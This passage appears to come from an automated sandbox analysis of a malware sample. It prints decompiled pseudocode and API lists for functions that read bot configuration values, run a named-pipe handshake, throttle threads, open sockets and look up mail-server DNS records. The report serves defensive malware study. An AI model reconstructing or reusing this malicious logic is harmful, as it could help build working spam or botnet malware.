				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}














                                                                                0x0040201e
                                                                                0x00402020
                                                                                0x0040202f
                                                                                0x0040202f
                                                                                0x0040203b
                                                                                0x0040203d
                                                                                0x0040204c
                                                                                0x0040204c
                                                                                0x00402058
                                                                                0x0040205a
                                                                                0x00402069
                                                                                0x00402069
                                                                                0x00402078
                                                                                0x00402080
                                                                                0x0040208e
                                                                                0x00402090
                                                                                0x00402095
                                                                                0x0040209a
                                                                                0x0040209c
                                                                                0x004020a1
                                                                                0x004020ab
                                                                                0x00000000
                                                                                0x004020ad
                                                                                0x004020ad
                                                                                0x004020bd
                                                                                0x004020d0
                                                                                0x004020d0
                                                                                0x004020d0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004020bd
                                                                                0x00000000
                                                                                0x004020bf
                                                                                0x004020bf
                                                                                0x004020c0
                                                                                0x004020c9
                                                                                0x004020ce
                                                                                0x004020d4
                                                                                0x004020d6
                                                                                0x004020d6
                                                                                0x004020e5
                                                                                0x004020e7
                                                                                0x004020ec
                                                                                0x004020f1
                                                                                0x004020f3
                                                                                0x004020f8
                                                                                0x00402102
                                                                                0x00000000
                                                                                0x00402104
                                                                                0x00402104
                                                                                0x00402114
                                                                                0x00402127
                                                                                0x00402127
                                                                                0x00402127
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402114
                                                                                0x00000000
                                                                                0x00402116
                                                                                0x00402116
                                                                                0x00402117
                                                                                0x00402120
                                                                                0x00402125
                                                                                0x0040212b
                                                                                0x0040212d
                                                                                0x0040212d
                                                                                0x0040213f
                                                                                0x00402151
                                                                                0x00402159
                                                                                0x00402160
                                                                                0x0040216a
                                                                                0x00402170
                                                                                0x00402189
                                                                                0x00402197
                                                                                0x0040219c
                                                                                0x004021a1
                                                                                0x004021c1
                                                                                0x004021c1
                                                                                0x004021a3
                                                                                0x004021a3
                                                                                0x004021a7
                                                                                0x00000000
                                                                                0x004021a9
                                                                                0x004021ad
                                                                                0x004021ae
                                                                                0x004021b6
                                                                                0x004021b9
                                                                                0x004021b9
                                                                                0x004021a7
                                                                                0x004021a1
                                                                                0x004021d1
                                                                                0x004021da
                                                                                0x004021e7
                                                                                0x004021ed
                                                                                0x004021f5
                                                                                0x004021f5
                                                                                0x00402204

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402078
                                                                                • GetTickCount.KERNEL32 ref: 004020D4
                                                                                • GetTickCount.KERNEL32 ref: 004020DB
                                                                                • GetTickCount.KERNEL32 ref: 0040212B
                                                                                • GetTickCount.KERNEL32 ref: 00402132
                                                                                • GetTickCount.KERNEL32 ref: 00402142
                                                                                  • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
                                                                                  • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,76A1F210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093
                                                                                  • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                  • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                  • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                • API String ID: 3976553417-1522128867
                                                                                • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F315 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • htons.WS2_32(0040CA1D), ref: 0040F34D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
                                                                                • closesocket.WS2_32(00000000), ref: 0040F375
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesockethtonssocket
                                                                                • String ID: time_cfg
                                                                                • API String ID: 311057483-2401304539
                                                                                • Opcode ID: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                • Opcode Fuzzy Hash: 685126c5453265c7bff9625bd6507709e61d04640598cf9eaa2582fbc6c48842
                                                                                • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040405E Relevance: 16.7, APIs: 11, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0040405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00404000(E00403ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x4122f8;
					if(_t43 == 0) {
						L10:
						E0040EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
							if(_t99 != 0xffffffff) {
								break;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						L14:
						while(1) {
							do {
								L14:
								while(1) {
									do {
										if(ConnectNamedPipe(_t99, 0) != 0) {
											goto L16;
										}
										_t71 = GetLastError();
										asm("sbb eax, eax");
										if( ~(_t71 - 0x217) + 1 == 0) {
											L25:
											DisconnectNamedPipe(_t99);
											continue;
										}
										L16:
										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
										_t104 = _t104 + 0x14;
									} while (_t49 == 0);
									_t92 = _v16;
									_v8 = (_v12 >> 2) + _v12;
									E00403F18(_t99,  &_v8, 4, _t92, _t102);
									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
									_t104 = _t104 + 0x28;
									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
										goto L25;
									} else {
										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t62 == 0 || _v24 != 0xc) {
											goto L25;
										} else {
											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
											_t104 = _t104 + 0x14;
											if(_t64 == 0) {
												goto L25;
											}
											break;
										}
									}
								}
							} while (_v28 != 1);
							E00403F18(_t99,  &_v8, 4, _t92, _t102);
							_t103 = _t104 + 0x14;
							if(_v32 == 0) {
								_t102 = CloseHandle;
								CloseHandle(_t99);
								CloseHandle(_t92);
								E0040E318();
								L8:
								ExitProcess(0);
							}
							 *0x41215a =  *0x41215a + 1;
						}
					}
					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0040ECA5();
					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}



























                                                                                0x0040405e
                                                                                0x0040406d
                                                                                0x00404070
                                                                                0x00404076
                                                                                0x0040407b
                                                                                0x00404090
                                                                                0x00404096
                                                                                0x00404097
                                                                                0x0040409c
                                                                                0x004040a1
                                                                                0x004040a8
                                                                                0x00404130
                                                                                0x00404134
                                                                                0x00404139
                                                                                0x0040413e
                                                                                0x0040413f
                                                                                0x00404153
                                                                                0x00404160
                                                                                0x00404165
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040416c
                                                                                0x00404174
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404179
                                                                                0x00000000
                                                                                0x00404182
                                                                                0x00000000
                                                                                0x00404188
                                                                                0x00404188
                                                                                0x00000000
                                                                                0x00404188
                                                                                0x00404188
                                                                                0x00404193
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404195
                                                                                0x004041a2
                                                                                0x004041a5
                                                                                0x0040425e
                                                                                0x0040425f
                                                                                0x00000000
                                                                                0x0040425f
                                                                                0x004041ab
                                                                                0x004041b6
                                                                                0x004041bb
                                                                                0x004041be
                                                                                0x004041c5
                                                                                0x004041d0
                                                                                0x004041da
                                                                                0x004041e8
                                                                                0x004041ed
                                                                                0x004041f2
                                                                                0x00000000
                                                                                0x00404202
                                                                                0x0040420b
                                                                                0x00404210
                                                                                0x00404215
                                                                                0x00000000
                                                                                0x0040421d
                                                                                0x00404226
                                                                                0x0040422b
                                                                                0x00404230
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404230
                                                                                0x00404215
                                                                                0x004041f2
                                                                                0x00404232
                                                                                0x00404245
                                                                                0x0040424a
                                                                                0x00404251
                                                                                0x0040426a
                                                                                0x00404271
                                                                                0x00404274
                                                                                0x00404276
                                                                                0x0040411f
                                                                                0x00404121
                                                                                0x00404121
                                                                                0x00404253
                                                                                0x00404253
                                                                                0x00404188
                                                                                0x004040b2
                                                                                0x004040b7
                                                                                0x004040be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004040c9
                                                                                0x004040d5
                                                                                0x004040e7
                                                                                0x004040ec
                                                                                0x004040f1
                                                                                0x0040412a
                                                                                0x00000000
                                                                                0x00404101
                                                                                0x0040410b
                                                                                0x00404117
                                                                                0x0040411c
                                                                                0x00000000
                                                                                0x0040411c
                                                                                0x004040f1
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                • ExitProcess.KERNEL32 ref: 00404121
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventExitProcess
                                                                                • String ID:
                                                                                • API String ID: 2404124870-0
                                                                                • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C2DC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0040C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0040A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x40c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740041
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x41366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f004120
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

























                                                                                0x0040c2dc
                                                                                0x0040c2de
                                                                                0x0040c2e4
                                                                                0x0040c2e9
                                                                                0x0040c2ef
                                                                                0x0040c482
                                                                                0x0040c485
                                                                                0x0040c488
                                                                                0x0040c48b
                                                                                0x0040c48e
                                                                                0x0040c491
                                                                                0x0040c494
                                                                                0x0040c497
                                                                                0x0040c499
                                                                                0x0040c499
                                                                                0x0040c4a0
                                                                                0x0040c4a3
                                                                                0x0040c4a6
                                                                                0x0040c4a9
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4d5
                                                                                0x0040c4c1
                                                                                0x0040c4c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c4cc
                                                                                0x0040c2fe
                                                                                0x0040c326
                                                                                0x0040c329
                                                                                0x0040c337
                                                                                0x0040c337
                                                                                0x0040c337
                                                                                0x0040c342
                                                                                0x0040c345
                                                                                0x0040c348
                                                                                0x0040c348
                                                                                0x0040c34e
                                                                                0x0040c351
                                                                                0x0040c354
                                                                                0x0040c357
                                                                                0x00000000
                                                                                0x0040c357
                                                                                0x0040c32b
                                                                                0x0040c32d
                                                                                0x0040c330
                                                                                0x0040c335
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c300
                                                                                0x0040c300
                                                                                0x0040c300
                                                                                0x0040c30b
                                                                                0x0040c316
                                                                                0x0040c319
                                                                                0x0040c31c
                                                                                0x0040c321
                                                                                0x0040c35a
                                                                                0x0040c35d
                                                                                0x0040c47a
                                                                                0x0040c47d
                                                                                0x00000000
                                                                                0x0040c47d
                                                                                0x0040c363
                                                                                0x0040c365
                                                                                0x0040c36d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c376
                                                                                0x0040c37f
                                                                                0x0040c378
                                                                                0x0040c378
                                                                                0x0040c37a
                                                                                0x0040c37a
                                                                                0x0040c37a
                                                                                0x0040c384
                                                                                0x0040c389
                                                                                0x0040c38d
                                                                                0x0040c38d
                                                                                0x0040c395
                                                                                0x0040c397
                                                                                0x0040c397
                                                                                0x0040c399
                                                                                0x0040c39c
                                                                                0x0040c39c
                                                                                0x0040c39f
                                                                                0x0040c3ac
                                                                                0x0040c3ad
                                                                                0x0040c3b5
                                                                                0x0040c3b8
                                                                                0x0040c3bc
                                                                                0x0040c3bd
                                                                                0x0040c3c1
                                                                                0x0040c3c7
                                                                                0x0040c3c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c3cb
                                                                                0x0040c3d0
                                                                                0x0040c3d0
                                                                                0x0040c3cd
                                                                                0x0040c3cd
                                                                                0x0040c3cd
                                                                                0x00000000
                                                                                0x0040c3c3
                                                                                0x0040c3c3
                                                                                0x0040c3d1
                                                                                0x0040c3d1
                                                                                0x0040c3d4
                                                                                0x0040c3d8
                                                                                0x0040c3da
                                                                                0x0040c3da
                                                                                0x0040c3e3
                                                                                0x0040c3eb
                                                                                0x0040c3f0
                                                                                0x0040c3f2
                                                                                0x0040c3f2
                                                                                0x0040c3fd
                                                                                0x0040c405
                                                                                0x0040c408
                                                                                0x0040c419
                                                                                0x0040c41a
                                                                                0x0040c41d
                                                                                0x0040c421
                                                                                0x0040c42a
                                                                                0x0040c42b
                                                                                0x0040c430
                                                                                0x0040c436
                                                                                0x0040c43b
                                                                                0x0040c443
                                                                                0x0040c448
                                                                                0x0040c44b
                                                                                0x0040c453
                                                                                0x0040c456
                                                                                0x0040c456
                                                                                0x0040c45c
                                                                                0x0040c46c
                                                                                0x0040c475
                                                                                0x0040c45e
                                                                                0x0040c45e
                                                                                0x0040c467
                                                                                0x0040c467
                                                                                0x00000000
                                                                                0x0040c45c
                                                                                0x0040c3c1

                                                                                APIs
                                                                                  • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                  • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                • GetTickCount.KERNEL32 ref: 0040C31F
                                                                                • GetTickCount.KERNEL32 ref: 0040C32B
                                                                                • GetTickCount.KERNEL32 ref: 0040C363
                                                                                • GetTickCount.KERNEL32 ref: 0040C378
                                                                                • GetTickCount.KERNEL32 ref: 0040C44D
                                                                                • InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
                                                                                • CreateThread.KERNEL32 ref: 0040C4C1
                                                                                • CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                • String ID: localcfg
                                                                                • API String ID: 1553760989-1857712256
                                                                                • Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
                                                                                • Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
                                                                                • Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E33059 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97memorylibrarynetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll), ref: 00E33068
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 00E33078
                                                                                • GetProcAddress.KERNEL32(00000000,00410408), ref: 00E33095
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E330B6
                                                                                • htons.WS2_32(00000035), ref: 00E330EF
                                                                                • inet_addr.WS2_32(?), ref: 00E330FA
                                                                                • gethostbyname.WS2_32(?), ref: 00E3310D
                                                                                • HeapFree.KERNEL32(00000000), ref: 00E3314D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: iphlpapi.dll
                                                                                • API String ID: 2869546040-3565520932
                                                                                • Opcode ID: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction ID: d2312996abc0ea80514cb37dd93df5bbfe80191a390ec0bbd1d0750e941e3ba0
                                                                                • Opcode Fuzzy Hash: 1e8713dd52c6e8bc37e9b2497aa4af782d9b250ffd42f9daf4508d8acafa4540
                                                                                • Instruction Fuzzy Hash: 7231B631A0120AABDB119BB89C4CEAE7FB8EF04765F145225F518F7290DB74DE41CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3958D Relevance: 15.3, APIs: 10, Instructions: 284registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?), ref: 00E395A7
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00E395D5
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00E395DC
                                                                                • wsprintfA.USER32 ref: 00E39635
                                                                                • wsprintfA.USER32 ref: 00E39673
                                                                                • wsprintfA.USER32 ref: 00E396F4
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 00E39758
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00E3978D
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00E397D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID:
                                                                                • API String ID: 3696105349-0
                                                                                • Opcode ID: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction ID: 22bf90bc166a507d754f66f2721182d462a41ce5081d74e1a321b0989e7176ec
                                                                                • Opcode Fuzzy Hash: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction Fuzzy Hash: 55A16EB1900208EFEB25DFA0DC89FDA3FACEB45341F105066FA15E6152E7B5D984CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402D21 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85memorylibrarystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00402D21(intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				char _v28;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				long* _t30;
				intOrPtr* _t37;
				long _t39;
				long _t40;
				void* _t41;

				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t19 = GetModuleHandleA( &_v28);
				_t39 = 0;
				if(_t19 != 0) {
					L3:
					_t20 = GetProcAddress(_t19, "DnsQuery_A");
					if(_t20 == _t39) {
						L2:
						return 0;
					}
					_push(_t39);
					_t35 =  &_v16;
					_push( &_v16);
					_push(_t39);
					_push(_t39);
					_push(0xf);
					_push(_a4);
					if( *_t20() != 0) {
						goto L2;
					}
					_t37 = _v16;
					_v8 = _t39;
					_v12 = _t39;
					if(_t37 == _t39) {
						L14:
						return _v12;
					}
					do {
						if( *((short*)(_t37 + 8)) != 0xf) {
							goto L12;
						}
						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
						if(_t40 == 0) {
							break;
						}
						E0040EE2A(_t35, _t40, 0, 0x108);
						_t41 = _t41 + 0xc;
						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
						_t13 = _t40 + 8; // 0x8
						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
						_t30 = _v8;
						_v8 = _t40;
						if(_t30 != 0) {
							 *_t30 = _t40;
						} else {
							_v12 = _t40;
						}
						L12:
						_t37 =  *_t37;
						_t39 = 0;
					} while (_t37 != 0);
					goto L14;
				}
				_t19 = LoadLibraryA( &_v28);
				if(_t19 != 0) {
					goto L3;
				}
				goto L2;
			}














